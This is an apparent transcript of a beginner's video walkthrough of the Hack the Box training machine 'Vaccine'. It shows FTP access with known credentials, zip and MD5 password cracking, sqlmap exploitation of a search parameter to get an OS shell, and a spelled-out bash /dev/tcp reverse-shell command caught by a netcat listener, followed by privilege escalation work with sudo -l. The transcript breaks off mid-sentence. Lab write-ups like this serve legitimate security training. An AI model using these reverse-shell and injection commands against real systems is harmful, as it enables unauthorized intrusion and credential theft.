Hello and welcome to the video. This is going to be a video tutorial for the box vaccine, which is on the starting point section of Hack the Box. This is the third video tutorial that I've made so far. I'm just going to reiterate a couple of things that I've already said in those videos. I'm fairly new to hacking myself. Picked it up October of 2020, so not too long ago, and I've been learning with a training provider and also doing my own learning on the side, really, through trial and error, using TryHackMe and then Hack the Box. TryHackMe is a really good starting point because it goes into things in more detail, whereas Hack the Box can at times be a bit more non-hand holding. There is some walkthroughs and guides, and there's plenty of user submitted guides. There are other videos as well, all of which are really good, but I find that sometimes the video tutorials or even the written tutorials can go through quite quickly, and doesn't allow maybe a super new person to hacking to be able to understand what's going on fully. I mean, certainly the majority of it you probably can, but I thought just to consolidate my own learning and to give back to Hack the Box community, and if anyone needs it really, I thought I'd create this video series of all the machines that I can possibly do on Hack the Box, starting with the starting point machines first of all before moving on to the other retired free machines, and then if things go really well I may look to purchase the VIP membership, but you can do quite a lot of, I think you can do at least 15 machines for free kind of thing. Yep. So anyway, if I get anything wrong I do apologise. So the first thing we're going to do is open up our web browser. I like to use Firefox, and by default if you download Kali, a disk image of Kali Linux, and then run it with your virtual machine. I use VirtualBox. All of those can be quickly and easily downloaded from Google. I say quickly, Kali Linux machine might take a little bit longer to download. But this video tutorial will just be focusing on hacking vaccine. So if you need to download Kali and download VirtualBox, I suggest you pause this video and find out how to do that first of all. I'm using a brand new clean install, so this is like a snapshot one. This is like the initialization of the machine, so everything here is by default. So if you start up your Kali Linux or reset it to its factory default settings, then you should have the same experience that I have, really, hopefully, because all the configurations will be the same. So to open Firefox, we just click on that blue white dragon icon in the top left, and then we can just type in the search box Firefox. You can probably download other web browsers, they'll all work pretty much the same. I just use Firefox as I find it's probably the quickest to use, and it's probably my favourite. While Firefox is loading up, we're going to click on this icon here. This will be a quick way to open up the terminal prompt. Terminal is pretty much the same as the DOS command shell that you get on Windows, but it's just the Unix version. So we'll click this, and I'm just going to drag by clicking the top of the program. I'm going to click and drag that to the right of the screen. It should snap. Click and drag the Firefox browser to the left of the screen, and then that will snap to the left. We can also click and drag to upper left or lower right of the left or the right, and we can have a quarter of the screen, and it's up to personal preference. This is just how I like to do it at the moment. I like to have half my screen as terminal, half my screen displaying the web browser, and then to quickly open up some more tabs, you could easily click File and then New Terminal, or New Tab, whatever it says. But the keyboard shortcut is to hold Control and Shift and to press T. So I just did that a few times. Make sure when you're doing keyboard shortcuts in terminal, most of the time, pretty much all the time really, you need to hold Control and Shift to do keyboard shortcuts in terminal like this. If you just press Control and press a button, it might do something else. So yeah, Control, Shift and T. And while we wait for Hack the Box to load, I'm going to open up a new tab, and I'm just going to type in Sublime, because in a moment we're going to download the Sublime text editor. So I'll just let everyone sign in to Hack the Box, and I'm going to fast forward the video so you don't see my credentials. Okay, so once you are in, we're going to click on Labs Starting Point, and we're going to go down to Vaccine for this video tutorial. which is just there. Click on that one. Now you see I've already got it active. I've already done this yesterday, the day before I recorded this commentary, and today I'm going to go through it again. So I'm just leaving the machine just to kind of like, you know, show you how it would look. It would look like that. So click join the machine. You should see the IP address pop up. You see the top red button, connect to HTTP, and then we're going to click on starting point. And then out of these two options, make sure you pick Open VPN. The Palm Box one, I think you get 2 hours free, but then you have to pay for it. And it's web based. We want to do it, you know, the good old fashioned way with terminal. And then you'll see I'm using the EU for this one because that's what's worked for me last time. But later on, you'll see that we do switch over to the other one just because of connectivity issues. But for now, whether you're in the EU or the US, doesn't matter too much. Make sure you save the file though, so don't open with. Make sure you save it, and then it'll appear probably in your downloads folder. So if you look in my terminal on the right, I'm already ready in my downloads folder. So we're going to do CD downloads and then ls. Okay, and then ls is to list what's in the folder, and in the downloads folder we've only got that one file. So we need to sudo because it requires administrator privileges. We're going to use the program OpenVPN, and the file is going to open the file called starting point, and then it'll be your username.ovpn. And then because we're using sudo for the first time, it's going to just double check that you're responsible, and it'll ask you for your password again. It'll ask you for your password, sorry, and then it's done because it'll say initialization sequence complete. And then on this Hack the Box webpage, you should see that it'll go green in a minute. It'll say online, hopefully. So also we can type in if config, and we can use the flag -a, which is like a toggle option, like a switch, like turn it on or on or off. We want it on, we want A, and the A option just means or, and just show us all the connections, because sometimes it will hide connections aren't being used. But we can see here that these are all the connections we have, and on the interface TUN0 we have an IP address 10.10.14.205. So now we're going to download Sublime. So we'll go to Google, type in Sublime, click on the first link, then click on install for Linux, and then the code to install it via terminal is nicely there just for us to copy and paste. So we're going to copy in the first one, that's underneath install the GPG key. That'll say OK. Then we're going to copy this text, just press highlight the text you want, then hold control, press C, and then in the terminal click the terminal prompt, and then hold control and shift and press a V to paste it. So not just control V, control and shift and V. And then you'll see one newly installed here. Then we're going to take the stable release version, just copy and paste all that in again into terminal. Just be careful when you paste, because sometimes there's some strange characters. If it appears red in your terminal and it's not like green and orange and nice and neat like this, then just check that there wasn't some accidental characters put in next to it. If you do see any accidental characters, just delete those out, and hopefully everything should look green, white, or orange. Nice. You shouldn't see any reds. So we'll give that a minute to download. We can close that web page now. I'm going to make a note of this 10.10.10.46, but for now we can just paste it into a new web browser, because that IP address does lead to a web page. So just keep that there ready. Let's wait for the Sublime to finish downloading, and then here you go. Once it gives you back control, because it's completed that process, just typing in clear to clear the screen, and then we're just going to double check what is our IP address. 10.10.14.205. Okay, so we type in Subl, SUBL, stands for Sublime. That will open up the text editor. Sublime, it's like a notepad really. And I'm just dragging that to the bottom quadrant on the left, and then I'm opening up some new tabs with Control and N for new. The first tab, I always like to name the IP address of the machine we're attacking, and the name, so it's called vaccine. In the second tab, I always like to type in our IP address, and it's not the IP address, on the local network, which will be 10.0.2.15. Is at the top, ETH0. We need the IP address for the VPN tunnel that we opened with sudo openvpn, and then the file name. So when that opened up, that VPN, it's on a new interface, and even though it's coming out of the same physical port on our machine, it's treated like a totally different port basically, and it's called TUN0. Your IP address will be different, so you make a note of your IP address, because this will be important later when we use netcat. And I'm just using these lines here just to divide and separate the page a little bit, so I organise it a little bit more to keep it a little bit more neat. And I like to have a few ready on this tab. And then in the first section, I'm going to copy and paste in later on the system flag. And I will show you what that is. So if you are struggling and you just can't get it to work, then just pause the YouTube video screen, write down what is on the screen, the system flag, because the system flag should be the same, and just take mine, because this machine absolutely is the worst one of the starting point machines. It's horrendous, not because of anything the creator's done. It's more the fact that there's really bad connectivity issues, and I don't know whether those need to be ironed out. I don't know whether it's just me, but I think it's everyone. I think everyone is going to have problems with this machine. The machine's always being reset. I watched another YouTube kind of video tutorial that someone had made, and that person seemed to have loaded it around Christmas time last year, 2020, so fairly recent, and they hit the exact same problems that I've been hitting, and they seem to get around it the same way I got around it, which was kind of trial and error, to keep going, refreshing. Just keep refreshing. This machine is a nightmare, and it seems like it only allows a few people at a time, so there might be like 100 people connected, but it only really allows a few people to get connectivity to the server, the web page, to be able to run the SQL map and to run the netcat and keep a connection long enough to be able to find the root flag. There are no user flags. I think there used to be, but there's not anymore. They took that out. There's just a root flag. But yeah, don't be worried if you just, I would say try it. If it doesn't work, be prepared to come back and try again, like the day after, or give it a few hours and come back, and just don't stress, because it is a nightmare machine just because of the issues that it has. So we're going to go to the walkthroughs tab, and this is pretty much essential, or like 99% essential to open, because it's got in credentials from a previous machine. So if you didn't do the previous machine yet, you wouldn't know these credentials, which would make the hack a lot harder, because the way that it wants you to do it wouldn't be possible without these credentials. So thank you to the author of the machine and of the PDF. So I recommend that you copy and paste in a lot of this information, because later on when you do get access, you don't know how long you're going to have before the connectivity drops and it kicks you out. So as you can see here in my notes, in the tab for the machine, it already tells us the credentials FTP user, and then the password MC@FileZilla with a couple of numbers. So I'm already pasting in the FTP user, and I'm going to copy and paste the password. And I suggest you always copy and paste credentials, because you never know if you mistype a letter, or you accidentally read a letter wrong. The password has to be exact, doesn't it? So copy and paste in exactly what it offers to you. And the same with commands, copy and paste in, and then I would always suggest copy and pasting it first into Sublime, in case there's any like finger spaces missing, or if there's any characters that shouldn't be there that get accidentally typed in. So you'll see me now. This will be useful later on, this SQL map command. So I've copied it by highlighting it and then pressing Control-C, and I'm going to put it into my other tab. So I'm going to delete this in a second, because I realised this isn't really a credential. This is just like a command we could use. Excuse me. So yeah, on this tab where I store my useful commands that we need to type in, it's going to copy it again now. So make sure you highlight the whole thing, then hold Control and press C. You could right click and copy, but Control C is probably quicker. And then as you can see here, there's a finger space missing there, so you need to put one in after the -U. There's a finger space missing there, so after dashboard.php search equals A, you need a finger space. -- cookie equals, and then quotation mark php sesh id, and then the one that's already in there by default that the authors put in, that was their session ID, and it's always unique to everybody and to everybody's session with the web page. So I've just put 3 question marks for now, and then the last bit of the command we're going to need is --os -shell. So I've just put that command in there ready, so we can copy and paste it in nice and quickly later, and we can edit it as we need to, because as you'll see, we will have to refresh the page a few times, which will give us a different cookie, a different session ID value. So it's just a nightmare to keep typing it, so it's best to just copy and paste it into Sublime. And then this command as well, we're going to need once we do have access remotely to the with a shell with SQL map. We'll need this command bash -c, and then like a quote mark bash -i, the arrow sign, the and sign, /dev/tcp/10.10.414.205/4444 another arrow sign, and then the 1, and then close with the quotation mark. Your IP address will be different, remember, so it won't be 10.10.14.205, it'll be something else, so pick something else. However, the port number 4444 quad 4s, just keep that. It doesn't really matter what that is, as long as that is an available port on your machine. So here you go, you can see I'm just getting my notes nicely organized. We're going to need later on some more commands for once we're connected via the netcat reverse shell. So we're going to copy and paste this, because this will come in handy later. And like I said, later on, you don't know how long you can have connection. You have to be as quick as you can, really, before you lose connection, and then it's just a nightmare. So yeah, copy and paste that in as it is, that's fine. Shell equals /bin/bash /script /q /dev/null. Next we're going to copy and paste in. I was just checking what is it we need. We need to look at a file called dashboard.php, and it's going to be in the directory var www.html. And this is always a good place to look when you're looking for like credentials and things. This directory var www.html, especially if there's a web server that's being hosted. So I'm just going to type in the command ready change directory to that, so that we can just do ls and find that dashboard.php file that we need within there. Now this command, I don't think it works. It didn't seem to work for me, and that of the video I watched of someone else having a go, I don't think it worked for them either. But we'll use it just in case. Python 3 /c then quotation marks import pty : pty again, but I think I made a mistake and put pyt, and I don't notice that until later, but I don't think it makes a difference really. I don't think this command you really need for what we need to do. You can get away with it. Yeah, and then I was just checking what is this, and actually found out it's quite a common quick code to get a better shell, if it works, as long as Python 3 is installed on the machine that you are remotely hacked into. And as you can see, this website, it's on there. This is the first website that I checked about it. It's there. They say it's a quick and dirty method to kind of get in and upgrade your shell, because once you are in with the netcat, which is going to listen and then give you a simple netcat shell, that shell's not great. Like for example, you can't use tab to autocomplete, you can't use tab completion. Tab will like literally tab across a few spaces. That website, as well, as you can see, also mentions it. You know, it's quite a common little piece of code this is, if it works, like I said. And then this website as well will mention it. It was a bit annoying, I had to agree to cookies or whatever, privacy policy. And then when eventually allowed me into the website to look at it, and go down here, and you shall see it is also mentioned on this website. So that's 3 websites that all I typed in was how to upgrade netcat shell, and the first kind of 3 all mention this. So it's quite a well-known and useful little upgrade command. But you'll notice all 3 websites didn't use the speech marks kind of thing, the double quotes. They used the single quotes to begin with, and then here on the inside, instead of the single, they use the double. So I've just swapped them around, as you can see. So on the outside I've got the single quotes, and on the inside with the brackets and the bin bash I've got the double quotes. Now I don't know if that makes a massive difference. It probably doesn't make any difference, but the author did it that way around, whereas those 3 websites I looked at did it the other way around. So I've just changed my command there a little bit to match those 3 websites, just in case because that's what everyone else seemed to be doing. We're also going to need the command for later on, cd/etc/post. I think I was typing in here. Yeah, just to get me to that directory, which is hosting the file we need. But then I remembered we don't really, well, you could do it, but in reality, you wouldn't know it was there necessarily. I suppose you wouldn't know the other one was there either with the var www.html. So I thought I'd try something else. I'll try find command, and then the dash, and then type flag F for file. You can do D for directory or F for file, and then dash name and then the name of it. And you'll see this does kind of work, but the first time I do it, I don't think it does work. But then I get a couple of spare precious moments still with the connection, and I test it, and it does work. It's just that you'll see there was something that confused me at first. But you'll understand why we know to look for that pg_hpa.conf file. Anyway, first thing we're going to do is nmap with -A, -S, then the IP address of the machine, just to get like a quick scan of what ports are available. And because we want a quick scan, I use -F as well, which means fast. It'll just search like the 100 most common. The -A pretty much just means like tell me about the OS and the services that are running, and the -SC I think is tell me about any exploits, but I'm not entirely sure. To be honest, the -A and the -SC are very similar anyway, I think. So we're just going to copy and paste the results from the nmap scan, and this is like the first thing you do on any machine, isn't it? Really, you always want to check out the ports, what are open, what are closed, and what services are available, because then you can start looking for possible avenues of attack. What exploits, can these services be exploit? What exploits can we do on these services? And we can see some information like it's an Apache web browser, so it's definitely Linux, not Windows, whatever. We know it's the title of the web servers is megacore.login, or the title of the web page at least. Just giving us a bit more information. So I'm going to clear that now that the nmap scan information is saved, and we notice FTP is open, and FTP is always a good thing to check, file transfer protocol, and we just type in FTP and then the name of the IP address of the machine, and it'll ask for some kind of credentials to log into it, so you just can't log in anonymously. And we know because of the walkthrough telling us that we've already found these credentials in a previous machine. It's FTP user, and then the password, I'll just copy and paste it in, the password from my files. If it's wrong, if you type it wrong or paste it in wrong, don't worry, just type in user, and if you type in user on that FTP prompt, it will ask you again for your username and password. So once we're in, we need to download the backup.zip just by typing in dir to list what's in there, so we know what's there. Then we see the backup.zip, and then we type in get backup.zip. That means download it basically, and you'll see there transfer complete. So once you've done that, you can back up out of, you can just type in exit to back up out of it, and then it'll take you back to where you were, and we're in the home folder. That's where you can see desktop and documents and all that, and you'll now see a new file is there, the red one, backup.zip, and it's in red because it is zipped, I think, and it can't be opened at the minute because it's compressed. And I just want to move it, so I'm going to use mv backup.zip documents just to move that file into the documents, ls just to show you it's gone now, and then cd, change directory to documents, and I'm using the tab button here, so you press cd space and press tab, and it will give you some options like to autocomplete. So we're going to change to documents, and there it is, backup.zip, and then I want to make a directory now, so mkdir, make a directory. I want to make a new folder basically. I want to keep it nice and neat and in the folder, and the folder is just going to be called vaccine because that's the name of the machine we're attacking. So I need to move it now into that folder, so again mv move backup.zip, and again I typed it all out there, but you could just press tab to autocomplete like I did there. I tabbed, autocompleted the vaccine, and there was only one option, excuse me. So you just tab it and it gives you that one option straight away if there's only one, otherwise it will give you a menu to pick from with the arrow keys. So I put it into vaccine, just change into it, list what's in there, and yes, it's in there. And we can see here we are currently in the folder of home, which is that tilde sign, dash documents dash vaccine. And if you wanted to prove it, you could click on that white icon at the top for your folders, and you can see by default we're in the home folders, and then the home folder, and then within the home folder documents, within documents vaccine, and there's the file. So the tilde sign, that little squiggly line, that means that's the same as your username. So my username's Callie. So if I typed in Callie, or if I typed in the tilde, it'd be the same thing. We're going to try and unzip it, so uncompress it. We're using the command unzip. If you see a .zip file, you can always use unzip to uncompress it. But here it says password, so we can't unzip it. Excuse me, until we've typed in the password. So, don't know what it is yet. So we're going to clear the screen. We're going to try and crack the hash. So if we use zip to John, so the command zip to John, it's going to help us put the hash of the file of what the password is required into a document. Fix here. I've just gone back to my home directory, just showing you, if you're not sure, again, you'll always be on default be in your home directory when you open terminal, so you should see that you've got the squiggly line there, the tilde. Okay, and then if you type in ls, you can always see those default folders that pretty much everyone gets: desktop, documents, downloads, music, pictures, public, templates, videos. And then what we can do is you can use zip to John from anywhere. We could use it from here, but we need to give, because that file that we want to get the hash from is not in this folder we're currently in, we have to tell it where that file is located by typing out the real path address, which just means the whole thing. So you type in the tilde dash documents dash slash vaccine slash and then the name of the file, so it knows where to go to get that vaccine, where to get that backup.zip. But I like to CD a lot and to be actually in the directory, because then I don't need to keep typing out the real path address, but it's just personal preference. So you can see me now, CD. I want to go back to my documents, I want to go back into vaccine, there it is, ls, and now when I type in zip to John, I don't need to type in the tilde slash documents slash vaccine slash the name of the file. I can just type in zip to John, press tab, because there's only one file in there, so I'll just assume, are you talking about that file? Or typed in B and then tab, same thing. There's only one file in there, so it's only going to come up with that file. Then we're going to use that arrow sign, and then we're going to type in a name of a file. So that arrow sign means create a new file and put everything into that file. So we do zip to John, backup.zip, put it into hash me baby, the name of the file, and then as you can see we can use cat to concatenate to show me what's in there, and you can see everything's, all those, that lovely long hash is in there. So now we have a file. When you use John the Ripper, the command for it is just John, but it can't just do text. It can't take text as an argument, it has to take a file. So we have to do John, then the name of the file, whatever you called it, then dash dash fork equals 4. You don't have to do that, but it'll speed up the process. Dash w equals, and then we need the W means a word list. It's like a dictionary. It needs a bank of words to be able to try and dictionary attack it, because it's going to compare the hash against hashes of other words. So the most famous one probably is called RockU, which was discovered some time ago now, but it's like some common passwords that people have used. It's quite a big list, but by default it is on your machine. You can go to Google and download it, just type in RockU and you can find it to download. But if it's on your machine, you might as well get it, you know, from where it is. And at the minute it's based in /user /share /wordlist /RockU. No, that's the name of the file, sorry. So it's in that directory. So we're going to use gunzip to unzip it. As you can see though, permission denied. So I'm going to type in sudo and then gunzip, and then because I'm not in the folder where the file is kept, I'm going to have to use the real path address to get to it. Obviously you just need to type your password in if you use sudo. And then if we use locate rocku.txt again, it will show us it's there, and for some reason it still says .gz. That's because we haven't updated the database that locate uses, so don't worry about it too much. I'll talk about that probably in a different video. Anyway, cd, we're going to go to that directory where it is, and as you can see, sure enough, it has unzipped because it no longer has the .gz, and it's no longer red, it's white, which means it's readable, you know, fairly straightforward. So we're going to type in cat, then rocky.txt. As you can see, it's trying to show us the thousands and thousands of words in there. So I'm just going to hit Control and C at the same time, just Control and C to cancel. And then I'm going to change, no, not change it just yet. I'm going to copy that rocku.txt file because I don't want to remove this default one. I'll keep it here where it was, you know, by default. I'm going to copy a new one. So type in copy or CP, then the name of the file, the finger space, and then where we want it to go. We want it to go to home, documents, vaccine. So we use the ~document/vaccine. And then if we list this file we're still in, it's still there. So we haven't moved it, we just copied it. Then we can CD to where we want to go. We want to go to home, documents, vaccine. And sure enough, if we list what's in here, we've got the folders plus the files we had plus the rock-u. So now when we do --fork-4, leave that, but this -w equals, we don't need to type out a real path address. I mean, you could copy and paste it, which is quick, but because we're already in, at the moment, in this terminal, we're within home/documents/vaccine, the file's in here, we can just literally put equals rocky.txt, and that means it's just going to look in this directory, and it's going to find it because it's here. Boom, it's done. Less than a second, really quick, really good. And there will be the password. So I'm just going to highlight that, copy that, because that's going to get pasted into our Sublime notes. So I'm just making some notes here. Backup.zip password. Hope I'm not going too quickly. I imagine people will be, you know, if they are stuck and they're using this video to help them, great. I hope it helps. I imagine that people will be pausing the video and just checking out, you know, step by step what I'm doing. If I have gone too quick, but I assume a lot of people will kind of understand this already. So we're going to unzip backup.zip. Now we can use the password. Just copy that in. Thanks to John the Ripper. And there we go. There's two files in there that it's decompressing, so to speak, index.php and style.css. And as you can see, we can list what's in there. We can remove now the backup.zip. Don't need that anymore. So I got rid of that. I'll keep the rock-u for now. And out of those two, the style.css one isn't massively important, but the index.php can be important. So we catenate that, and we get some source code. And if we look up, we can see it's like HTML type document. And we can see here, username equals admin. So this is like a default kind of, I don't know why you would leave this in your index.php. You know, you shouldn't really leave this in here for people to find. That should have got taken out before it was saved, but never mind. Let's make a note then, so we know that to log into the web page index.php, which is going to be then the web page address will be 10.10.10.46/index.php. So we don't need to use dirbuster now to find that. We already know it exists. There's going to be probably a login, and we're going to need to use admin. Then there's an MD5 hash here. So the password, whatever the password is, that's the MD5 hash for it. So it gets translated with MD5 into that string of characters. So we're going to kind of reverse engineer that. We're going to go, we'll say, well, if this is the hash, what was the original password going backwards? So I'm just going to copy and paste that password in, and then I'm going to clear the screen because there's nothing else useful in there. In our web browser, we're going to type in what is MD5, just to double check, and it's basically a hash function. So you type in some letters, and it does an algorithm on it, and it translates it into a random string that no one's going to understand, like encryption basically. And we need to de-encrypt it, so to speak. We need the original password because that's what it'll take. It'll take the original password, the website. We can't just type in the hash. We have to type in what the password was. So we're going to look for a way to crack it on Google. Crack MD5 hash, because it's MD5. It's quite quicker and easier to just use a web page. You could use like John the Ripper, but we'll use this CrackStation website. Paste it in there. Make sure we complete the reCAPTCHA and then click crack hashes. And you can see there's quite a few options that this website does. But MD5 is definitely on the list, and we get a green result, which means exact match, QWERTY, and then some numbers. So we're just going to make a note of that, because obviously we don't want to forget. And like I say, if we copy and paste it, we can make sure we get exactly what the computer, you know, removes user error. Because if we're typing in all the time, you know, it's easy to mistype and misspell, or to misread what the password was. So there it is, pasted in, QWERTY789. So that can be closed now. That CrackStation, I think I'll close it in a second. Oh yeah, I just held Control and pressed S while I was in Sublime to save it. You don't have to save it. I don't know why I did save it, but I just called it Notes. There it is. Look. Okay. I think I closed it just to show you could open it by typing in Subl and then the name of the file you wanted to open, and that file with those tabs is called Notes. There it is. Oh yeah, I remember why now, because my cursor was froze. That little, not the mouse cursor, but like the text typing cursor, the little vertical line was froze, and now it's back to normal again now that I saved it and closed it and reopened it. Anyway, so I'm just double checking that everything's good. Yeah, sequence is fine. The VPN sequence is still up and running. So we finally go to that web page now, 10.10.10.46, and it does present to us with Megacore login, some kind of login page, and then paste it in there, and now you can see it says with the username and password put in, we can see here /dashboard.php. that is also known as index. If we typed in index, we'd kind of get redirected, and there's nothing much here other than a search box. And if you ever see a search box like this, and then when you type something in, if you look at the URL at the top, it says dashboard.php !search equals. That means SQL. There's like a SQL database probably in the background on the back end. That's what they say, on the back end. So behind the website, which is front facing, there's like a database behind it. And that database will take commands, so we can type in there commands to possibly exploit it, and that is one type of exploit, but we're not doing that one today. We're going to press F12 on the website to open up the elements, and we're going to copy and paste our cookie, and you're going to get a different one here. You see it's down there, it says value. You're going to get a totally random set of characters. Copy that, Control C, and put it into that command that we wrote in Sublime. Yeah, and then we need to use SQL map, and you could type this all out, but because I've already written it in there, I can just copy and paste it. So hold Control, press C, click on here, hold Control and Shift and press V, and as you can see here, it's put a tilde at the end, which I didn't want, so I deleted that, and then I move them to the start of it, and deleting those characters I didn't want at the start. To move quickly between the text, just hold Control and press left and right, and you kind of jump between whole words, so it's much quicker to move through than just holding left or right arrows without holding Shift. So once we type that command in, it'll ask you some things. Just press enter, because if you see a capital letter like capital Y, it means by default if you just press enter it's going to do the capital letter, so you can just press enter a couple of times here, and give it a moment. The initial time it does it will take longer, but then next time we do it, it shouldn't take as long when it starts working again, because it kind of already remembers, I think, or it creates a file and kind of can tell us about it a little bit quicker. Here, if you press enter, it's going to be no, because the N is capital, and we don't need to, because the search is the only thing vulnerable. And here you go, the parameter search, which is a get field or get function, I think, has kind of 3 or so vulnerabilities that are explained on the SQL map. So we're just going to copy and paste those into our notes just in case they were useful. So SQL map is kind of like, it reminds me of Metasploit MSF console. Kind of tells you what vulnerabilities are there, and then it can't really, maybe it can, but it doesn't really exploit them for you unless there's a certain command to do it. I think it can, but it more just tells you kind of like what vulnerabilities are there, and you probably can use SQL map to exploit them. We're going to use SQL map to exploit it to get a shell, a connection. But as you can see here, critical problem, it said it had timed out, so it done everything up to this --os -shell command. That didn't quite work, so double check, make sure you've got, if this happens to you, make sure you've got cookies, the value for the PHP sesh ID, make sure you've got that exactly copy and pasted correctly. I think if it's wrong, if it's off by 1 character, or if it's not in there at all, I don't think it will work. So as you can see here, the cars, Canon, Pico and Force, the bottom one, you can see they're all there and they're all in the list. But you'll notice if you try and refresh the page, you're probably going to encounter this error as well. If you don't encounter this, you're in for, you're lucky. Even if the machine is reset, if you don't get the machine reset, then you're lucky. I have the machine reset on me twice, and I think I have to reset it a third time myself. So I think in total, doing this over about an hour or so, there was 3 machine resets, and in like the last 2 videos that I did, last 2 boxes, I don't think there was 1 reset, and that's because I think a lot of people are having problems with it. And look, we log in again with the same username and password, and look, there's nothing there. And if you see nothing there, it's probably not going to work. You probably want to keep deleting the cookies, and maybe, as I do here, leave the machine, rejoin the machine. As I said, you pull your hair out of this machine, because there should be a list of cars there that were there by default, and they're not. So we delete the cookie, refresh the page, it will give us a new cookie, and we can sign back in, because the web browsers remembered the username and password, admin, and then whatever the password was. And here I was just double checking, did I type it in wrong? I need to put my new cookies in now anyway, because I deleted the previous cookie. So when you get a new one, you get given a new string. So make sure we put that into our command and we enter it again. The first bit worked fine, because you can see there, parameter search, and there's 3 or 4 possible exploits it's found, kind of thing. But again, it carries on, and then it gets down here, critical unsupported feature or unknown version of PostgreSQL, which is the OS shell. It's trying to run the --os shell command to get a connection remotely, but it's just not working. So here you can just see I'm just trying to delete the session cookie, a few times, just logging back in, because when you delete it and refresh, it kind of kicks you out, but it'll give you a new one when you refresh. And I was trying to see if those cars would appear again, because when those list of cars are there, they always seem to do better. They always seem to have a better connection. As you can see, my VPN's still open. The ton 0 still up. Same IP address. Nothing's changed there. That's all fine. So, if you're in this situation, don't worry. It's not you. It's not your commands. It's the machines. Or the server. There's something wrong, definitely. I don't think there's too many people, because the other machines have a lot of people having a go at them as well, and they didn't seem to suffer from this problem. So I've just skipped ahead a little bit. I decided to leave the machine and to try the other servers, maybe because there was too many people connected in this EU server. So I tried the US server, and there's only one server option, and you maybe want to change it to TCP, but I don't think it'll make a difference, so I just kept it as UDP, because I don't think that really matters. So we're going to connect, and then like we did earlier, really click OK to save the file, and that should be in our downloads. First of all, we're going to just close that VPN connection that we have just by holding Control, pressing C to SIGINT out of it. And then we're going to just double check on our ifconfig-a for all if it's gone, and as you can see, it's gone. The ton 0 is no longer there, so it's going to clear that. So make sure you're in your home/downloads folder. You should see the file there, and the new one's got like a --1 bracket, because it doesn't want to give, it doesn't want to call it the same name, because that would confuse the machine. I'm just going to rename it though by using the mv command. So mv, and then the name of the file you want to change, then a finger space after it. And if it's underlined, then it's recognized the file, and then just put in what you want to call it. So I just wanted to call it USA VPN. Nice and easy. There you go. So that's the new one. That's the one we need. So we're going to do the sudo open VPN, and then USA VPN. I pressed tab too early there, so it gave me too many options. So I typed in open first, then I tabbed, and there was less options. Type in your password if you use sudo. There you go, initialization sequence completed. That remained stable for the rest of the video. That was fine now. And as you can see, we have a new VPN. So we have a new IP address on this interface. 210 is now got the address of 10.10.14.162, and it tells you on the web page, hack the box as well. So don't forget to change that in your notes. And in this command here, it says bash -c. I just went down. I need to go back up. There it is. Here you go. I'm going to change that to 10.10.14.162. You change it to whatever your VPN is, of course. And we can keep the ports the same for 444. That doesn't really matter. So let's go back to our web browser. Let's go back to the web page on 10.10.10.46. And you can see you should have maybe your old cookie. So just delete all session cookies, sign in. And if you've got username and admin correct, you'll be signed in. But regardless, it will give you the cookie session. So copy and paste in the new value of that cookie into the command. Let's type that command into terminal. Make sure we have that -os-shell on the end of it, so we can try and open up a remote shell connection. Press enter. And I'm just going to skip the video ahead a little bit because it takes a little bit of time, and I still have connectivity issues. Like I said, you can pull your hair out at this. Don't worry, just keep trying, keep refreshing, change the VPN connection like I did, and if it doesn't work, come back again, in a day or two. So while we're waiting for that to work, we're going to open up a new terminal and we're going to type in nc-lvnp because this is going to be for netcat, and these are flags. P being port, so I think you need to put P at the end of those, and then obviously whatever number we used or we're going to use in our command, which by default we've just left as 4444, but you can change this to any working port number, I believe, and just leave that running, listening in the background. And after about 5-10 minutes of nothing working, all the cars had disappeared from the catalogue. It just didn't seem to want to work. I decided to try and reset the machine myself, and I will skip the video ahead a little bit here because this did take a couple minutes. I think it's waiting to see if other people's vote to skip it, or whether they vote they don't want to vote to reset it, or whether they vote they don't want to reset it. As you can see here, it did work. The machine was reset, and I think this is what saved it for me. But the problem is, I think you can only reset it yourself, or request to reset it once per 24 hours. So if you do try and reset it and it doesn't go through for whatever reason, whether it glitches out or whether the other people on the machine choose not to reset it, you will be stuck. And you might have to wait for someone else to try and reset it, or like I said, come back in 24 hours, because I think you're only allowed to do that once per day, which makes sense, because otherwise everyone will be frustrated with everyone resetting it. So then I tried to refresh and it did time me out to begin with, but then I tried to refresh again and it does work. So there you go, problem at first. So I just tried to refresh it again. And here we go, log back in. Oh yeah, I deleted the session cookie, just made a new one. And good sign, they're all back, which means that it's likely to work if it wants to. Obviously put in the new session ID value that you get, copy the command, type it, paste it in, press enter, and away we go. And I was shocked to tell you. Here you go, look, OS shell, we have a connection. Who am I? If you see this, just press enter, and we are Postgres. Perfect. So we're in. So this is why I said copy and paste in the commands ready in Sublime, so we can just whack them in as quick as possible. So I typed in the command, it was all ready to go. Got my IP address in there, got the 4444 ready. Boom. If you check your netcat listener, you got the shell listening. It should create a connection. Type in who am I. You should get the username Postgres. Now we type in, paste in our first command to try and upgrade our shell. I think it worked, I'm not entirely sure. Nothing seemed to have happened, but anyway, just type in just in case. And then, forgot to press just Control and C. I must press Control and Shift. Just Control C there, Control Shift V there. Change directory to one we want, list what's in it. We can see the dashboard.php. I'm doing this as quickly as possible before I lose connection, because it's so temperamental, this machine. Cat out that file, and I tried to press tab there. Tab autocomplete doesn't work. Type in the whole name, dashboard.php. Scroll up. This is the bit we need. User Postgres password is password, but with some funny characters. Copy that. Put that straight into your notes. For the interest of time, I'll just put it in this tab instead of changing back over to the credentials tab. I was like, let's just be quick. Let's just whack it in. And then we can scroll down again because we don't really need that. I'll just press enter a couple times to check I still have connection. Who am I? Yeah, still have connection by the looks of it, because it's returning back an output. And then this is the Python 3 command that I typed in. That wasn't going to work, and I seem to have lost connection. Just for some reason, session terminated. But I still seem to have the connection on the SQL map side. Yeah, I did look. Postgres retrieved, so we still have a connection there. So I went back, copy and pasted this bash command to open back up, but then I remembered I better do the netcat again, so I just pressed up, press up a couple times on the keyboard to cycle through the history of what you've typed in, get that netcat listener set back up on 4444, boom, back in again. Let's go through the process then. Shell equals bin bash script -q dev null. Get that in just in case we need it. I'm not entirely sure if it worked. Don't really need to change now to that directory to get the password. We know the password, so I'll put that command in again, and sure enough, it didn't work. I tried to see why it didn't work. Later on, I do realise my mistake, and then we find this file that we need, because you'll see why we try and find this file. But you can see here it said permission denied like 1,000 times. I thought I'd typed it in wrong, but I hadn't. I'll go over that later. And then the reason that we want to go to that file, pg_hba.conf, is because when we type in sudo -l, it will give us a list of all the commands that we're allowed, we have the privileges to run in this as this user. So you'll see me just again try and wasting time messing around with the find. So I was like, forget it, sudo -l, and then obviously we know the password thanks to that dashboard.php file. Type the password in, and here we go. User Postgres may run the following commands: bin v, and then the real path address location to open up. So we have permission to open up the pg_hba.conf file using vim. Which is a text editor, a 